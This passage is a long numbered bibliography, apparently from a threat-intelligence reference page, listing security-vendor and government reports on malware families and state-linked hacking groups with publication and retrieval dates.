  51. CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021. 

  52. Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021. 

  53. Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018. 

  54. Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy’s ‘Komplex’ OS X Trojan. Retrieved July 8, 2017. 

  55. Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018. 

  56. Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021. 

  57. Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022. 

  58. Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022. 

  59. Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016. 

  60. Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018. 

  61. Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018. 

  62. Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018. 

  63. FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022. 

  64. Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018. 

  65. Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019. 

  66. Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020. 

  67. Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021. 

  68. CrowdStrike. (2022, May). ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK. Retrieved June 27, 2022. 

  69. Ehrlich, A., et al. (2022, September). THE MYSTERY OF METADOR | AN UNATTRIBUTED THREAT HIDING IN TELCOS, ISPS, AND UNIVERSITIES. Retrieved January 23, 2023. 

  70. SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023. 

  71. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022. 

  72. Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020. 

  73. Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020. 

  74. Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020. 

  75. Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022. 

  76. Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018. 

  77. ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021. 

  78. Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020. 

  79. Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021. 

  80. Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018. 

  81. Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018. 

  82. Kaspersky Lab’s Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018. 

  83. Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018. 

  84. Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019. 

  85. PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020. 

  86. PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020. 

  87. CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020. 

  88. National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020. 

  89. Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018. 

  90. Kwiatkoswki, I. and Delcher, P. (2021, September 29). DarkHalo After SolarWinds: the Tomiris connection. Retrieved December 27, 2021. 

  91. Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021. 

  92. Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021. 

  93. Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019. 

  94. Schlapfer, Patrick. (2022, June 6). A New Loader Gets Ready. Retrieved December 13, 2022. 

  95. Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020. 

  96. ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020. 

  97. Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022. 

  98. Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021. 

  99. ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017. 

  100. Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022. 

  101. Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022. 

  102. Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018. 

  103. Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020. 

  104. Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016. 

  105. Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020. 

  106. CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020. 

  107. Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017. 

  108. Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017. 

  109. Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021. 

  110. Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020. 

  111. Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020. 

  112. Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016. 

  113. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021. 

  114. Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021. 

  115. Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021. 

  116. Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020. 

  117. Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016. 

  118. Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022. 

  119. ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022. 

  120. F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014. 

  121. hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020. 

  122. GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021. 

  123. Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021. 

  124. Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017. 

  125. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021. 

  126. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. 

  127. Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021. 

  128. Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021. 

  129. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015. 

  130. FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. 

  131. Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019. 

  132. Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020. 

  133. FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015. 

  134. Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020. 

  135. Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020. 

  136. Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018. 

  137. Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018. 

  138. Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020. 

  139. Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020. 

  140. Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020. 

  141. Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020. 

  142. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022. 

  143. Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020. 

  144. Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. 

  145. Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020. 

  146. FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. 

  147. Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. 

  148. ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017. 

  149. Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. 

  150. Kaspersky Lab’s Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014. 

  151. Kaspersky Lab’s Global Research & Analysis Team. (2014, August 06). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros. Retrieved November 7, 2018. 

  152. Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018. 

  153. Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021. 

  154. Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018. 

  155. Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018. 

  156. Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018. 

  157. Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018. 

  158. Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018. 

  159. DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020. 

  160. Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020. 

  161. Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020. 

  162. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018. 

  163. NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020. 

  164. Hasherezade. (2021, April 6). A deep dive into Saint Bot, a new downloader. Retrieved June 9, 2022. 

  165. FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. 

  166. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018. 

  167. Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020. 

  168. Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021. 

  169. KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022. 

  170. Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021. 

  171. Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019. 

  172. Falcone, R. et al.. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022. 

  173. S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022. 

  174. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020. 

  175. Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018. 

  176. Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018. 

  177. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018. 

  178. Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019. 

  179. Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020. 

  180. Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020. 

  181. McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020. 

  182. Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020. 

  183. Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020. 

  184. Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022. 

  185. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017. 

  186. Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019. 

  187. Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021. 

  188. The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018. 

  189. Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018. 

  190. ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019. 

  191. The Cylance Threat Research Team. (2017, March 22). El Machete’s Malware Attacks Cut Through LATAM. Retrieved September 13, 2019. 

  192. kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020. 

  193. MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021. 

  194. MalwareBytes Threat Intelligence Team. (2022, August 3). Woody RAT: A new feature-rich malware spotted in the wild. Retrieved December 6, 2022. 

  195. Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22  

  196. Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel’s infiltration and isolation network. Retrieved March 24, 2021. 

  197. ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016. 

  198. Neeamni, D., Rubinfeld, A.. (2021, July 1). Diavol - A New Ransomware Used By Wizard Spider?. Retrieved November 12, 2021. 

  199. Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022. 

  200. Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014. 

  201. Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019. 

  202. Kaspersky Lab’s Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014. 

  203. Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022. 

  204. Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021. 

  205. Kizhakkinan, D. et al.. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018. 

  206. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018. 

  207. Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019. 

  208. Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019. 

  209. Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018. 

  210. Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022. 

  211. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018. 

  212. Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018. 

  213. Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022. 

  214. Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016. 

  215. Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020. 

  216. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018. 

  217. Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018. 

  218. ESET. (2018, November 20). Sednit: What’s going on with Zebrocy?. Retrieved February 12, 2019. 

  219. Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019. 

  220. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019. 

  221. Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019. 

  222. CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020. 

  223. Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022. 

  224. ClearSky Research Team. (2020, August 13). Operation ‘Dream Job’ Widespread North Korean Espionage Campaign. Retrieved December 20, 2021. 

  225. Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021 

  226. Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014. 

  227. Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020. 

  228. Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021. 

  229. Hada, H. (2021, December 28). Flagpro The new malware used by BlackTech. Retrieved March 25, 2022. 

  230. Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018. 

  231. Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020. 

  232. Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020. 

  233. Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018. 

  234. Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022. 

  235. Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021. 

  236. Secureworks Counter Threat Unit Research Team. (2022, August 17). DarkTortilla Malware Analysis. Retrieved November 3, 2022. 

  237. MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022. 

  238. Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018. 

  239. Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018. 

  240. hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020. 

  241. Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018. 

  242. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018. 

  243. Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019. 

  244. Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020. 

  245. ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021. 

  246. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018. 

  247. Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021. 

  248. Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021. 

  249. Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018. 

  250. Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016. 

  251. Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021. 

  252. CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020. 

  253. Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018. 

  254. F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. 

  255. Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016. 

  256. Kaspersky Lab’s Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016. 

  257. Kaspersky Lab’s Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016. 

  258. Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. 

  259. Kaspersky Lab’s Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018. 

  260. CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022. 

  261. Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019. 

  262. Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019. 

  263. Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019. 

  264. Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. Retrieved September 21, 2022. 

  265. GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021. 

  266. Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018. 

  267. Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020. 

  268. Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022. 

  269. Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021. 

  270. Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021. 

  271. F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015. 

  272. Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017. 

  273. Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017. 

  274. Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022. 

  275. Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020. 

  276. SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19  

  277. Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018. 

  278. Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift’s implant: OSX.WindTail (part 2). Retrieved October 3, 2019. 

  279. CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021. 

  280. Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022. 

  281. Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017. 

  282. Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017. 

  283. Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020. 

  284. Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018. 

  285. Ramin Nafisi. (2021, September 27). FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor. Retrieved October 4, 2021. 

  286. Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014. 

  287. Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019. 

